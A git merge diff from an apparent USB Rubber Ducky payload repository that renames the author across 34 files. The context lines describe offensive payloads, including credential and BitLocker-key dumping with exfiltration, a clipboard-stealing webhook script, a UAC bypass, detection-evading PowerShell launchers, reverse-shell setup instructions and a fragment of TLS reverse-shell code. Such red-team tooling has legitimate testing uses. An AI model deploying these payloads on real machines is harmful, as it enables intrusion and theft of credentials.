Merge pull request #451 from 0i41E/master

Changed Username
pull/412/merge
Dallas Winger 2024-05-30 15:54:13 -04:00 committed by GitHub
commit a0f6dae0dd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
34 changed files with 77 additions and 77 deletions

View File

@ -1,6 +1,6 @@
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:

View File

@ -1,6 +1,6 @@
EXTENSION POWERSHELL_DOWNLOAD
REM VERSION 1.0
REM Author: 0iphor13
REM Author: 0i41E
REM Downloads the desired file via powershell
REM Use the method you want to use, via the specific function, define the URL and the output.

View File

@ -1,6 +1,6 @@
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM Author: 0i41E
REM OS: Windows
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum

View File

@ -1,7 +1,7 @@
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13
Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM

View File

@ -1,6 +1,6 @@
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Author: 0i41E
REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions

View File

@ -1,6 +1,6 @@
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.

View File

@ -1,7 +1,7 @@
REM BitLockerKeyDump
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.

View File

@ -1,6 +1,6 @@
**Title: BitLockerKeyDump**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>

View File

@ -1,6 +1,6 @@
**Title: SamDumpDucky**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 2.0<br>
@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

View File

@ -1,6 +1,6 @@
REM Title: SamDumpDucky
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
REM Author: 0iphor13
REM Author: 0i41E
REM Version: 2.0
REM Category: Credentials
REM Attackmodes: HID, Storage
@ -36,10 +36,10 @@ EXTENSION DETECT_READY
CAPSLOCK
END_EXTENSION
REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here
REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Author: 0i41E
REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions
@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION
END_EXTENSION
REM Extension by 0iphor13, to signalize the successful execution of the payload
REM Extension by 0i41E, to signalize the successful execution of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:

View File

@ -1,7 +1,7 @@
REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.

View File

@ -1,6 +1,6 @@
**Title: WindowsLicenseKeyExfiltration**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>

View File

@ -1,7 +1,7 @@
REM DuckyHelper
REM Version 1.0
REM OS: Windows 10
REM Author: 0iphor13
REM Author: 0i41E
REM UAC bypass for privilege escalation (Method FodHelper)
REM AV will notify, but payload will still be executed

View File

@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat
### #HOOK ###
Define your webhook under #HOOK
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)

View File

@ -1,10 +1,10 @@
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT
@ -52,7 +52,7 @@ END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0iphor13
REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
@ -132,7 +132,7 @@ END_EXTENSION
EXTENSION Detect_Finished
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:

View File

@ -1,6 +1,6 @@
**Title: HashDumpDucky**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Requirements: DuckyScript 3.0<br>
Version: 1.0</p>
@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe
Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go
#
Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png)
*props to Nikhil Mittal*

View File

@ -1,7 +1,7 @@
REM HashDumpDucky
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Author: 0i41E
REM Requirements: RubberDucky mk2/DuckyScript 3.0
REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection.

View File

@ -1,6 +1,6 @@
**Title: EngagementDucky**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Requirements: DuckyScript 3.0<br>
Version: 1.0</p>
@ -10,7 +10,7 @@ Version: 1.0</p>
<p>EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.<br>
Step up your game and demonstrate impact in a few seconds without leaving your scope.</p>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png)
**Instruction:**
1. Configure USB identifiers
@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s
2. Place inject.bin onto your Ducky
3. Plug in your Ducky and wait until finish... walk away
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png)

View File

@ -54,7 +54,7 @@ REM # * Be responsible.
REM # #
REM # Kudos: #
REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #
REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" #
REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #
REM # * the-jcksn - "ducky_crab" #
REM # * I am Jakoby - "-RD-PineApple" #
REM # * Hak5 Team #

View File

@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

View File

@ -95,7 +95,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13)
* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)

View File

@ -1,7 +1,7 @@
REM EternalLock
REM Version 1.0
REM OS: Windows / Unix
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)

View File

@ -1,6 +1,6 @@
**Title: SoundChangeDuck**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0</p>

View File

@ -1,7 +1,7 @@
REM SoundChangeDuck
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Author: 0i41E
REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail.
REM You can of course decide which system sounds you want to change.

View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhellDucky
# Modified by 0i41E for PingZhellDucky
#
#
#

View File

@ -1,6 +1,6 @@
**Title: PingZhellDucky**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows & Unix<br>
Version: 1.2<br>
Requirements: DuckyScript 3.0, perl</p>
@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di
With automatic setup:
Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png)
Define the IP of your attacking machine between the quotes at the ATTACKER section
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png)
Start the client -> `perl PingZhellDucky.pl`
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
<p>Plug your Ducky into a Windows target.<br>
Achieve reverse shell.<br>
@ -38,7 +38,7 @@ Achieve reverse shell.<br>
**Instruction Version 2:**
Without automatic setup:
Define INSTALL and set it to FALSE
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
Upload PingZhellDucky.pl onto your attacking machine.
Install dependencies, if needed:
@ -50,10 +50,10 @@ Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl PingZhellDucky.pl`
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
Define the IP of your attacking machine between the quotes at the ATTACKER section
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
<p>Plug your Ducky into a Windows target.<br>
Achieve reverse shell.<br>

View File

@ -1,7 +1,7 @@
REM PingZhellDucky
REM Version 1.2
REM OS: Windows & Unix
REM Author: 0iphor13
REM Author: 0i41E
REM Requirements: DuckScript 3.0, Perl
REM Getting remote access via ICMP or perform the required setup
@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
REM Will trigger when not using Windows - Best use with Linux
DEFINE INSTALL TRUE
REM Link to the PingZhellDucky.pl client - Required for installation
DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
IF ($_OS == WINDOWS) THEN

View File

@ -1,7 +1,7 @@
REM ReverseDucky
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.

View File

@ -1,7 +1,7 @@
REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.

View File

@ -1,7 +1,7 @@
REM ReverseDucky3
REM Version 1.2 (End of Life - This payload won't be updated anymore)
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Author: 0i41E
REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
REM Fill in Attacker-IP and Port in Line 18

View File

@ -1,6 +1,6 @@
**Title: ReverseDuckyPolymorph**
<p>Author: 0iphor13, Korben<br>
<p>Author: 0i41E, Korben<br>
OS: Windows<br>
Version: 1.1<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward.
- First, start a listener on your attacking machine via the tool of your choice.
- Second, define the IP-Address and Port of your listening machine
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)
- Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
#
Every session you will gain via this payload will result in a different ID to verify a different pattern.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)
Credit for DS 3.0 implentation and ideas:
- Korben

View File

@ -1,5 +1,5 @@
REM Title: ReverseDuckyPolymorph
REM Author: 0iphor13, Korben
REM Author: 0i41E, Korben
REM Version 1.1
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)

View File

@ -1,6 +1,6 @@
# Title: ReverseDuckyUltimate
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
#
## Instruction
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
- First: Create key.pem & cert.pem like so: <br>
```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
It will ask for information about the certificate - Insert whatever you want.<br>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
- Second: Start a listener on your attacking machine which supports certificates.
Examples:
@ -31,25 +31,25 @@ ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
Additionally add an unique identifier to give your Duck a name.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
## Instruction - Automatic Setup
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
#
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
Credit for DS 3.0 implentation and ideas:
- Daniel Bohannon

View File

@ -1,7 +1,7 @@
REM ReverseDuckyUltimate
REM Version 1.3
REM OS: Windows / Unix
REM Author: 0iphor13
REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
@ -49,10 +49,10 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
@ -131,7 +131,7 @@ END_EXTENSION
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@ -164,7 +164,7 @@ END_EXTENSION
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13
Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM
@ -380,7 +380,7 @@ ELSE_DEFINED
Polymorphism2()
STRING .GetStream();
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);
Polymorphism3()
STRING =new-object System.IO.StreamWriter($sSL);
STRING $sSL.write(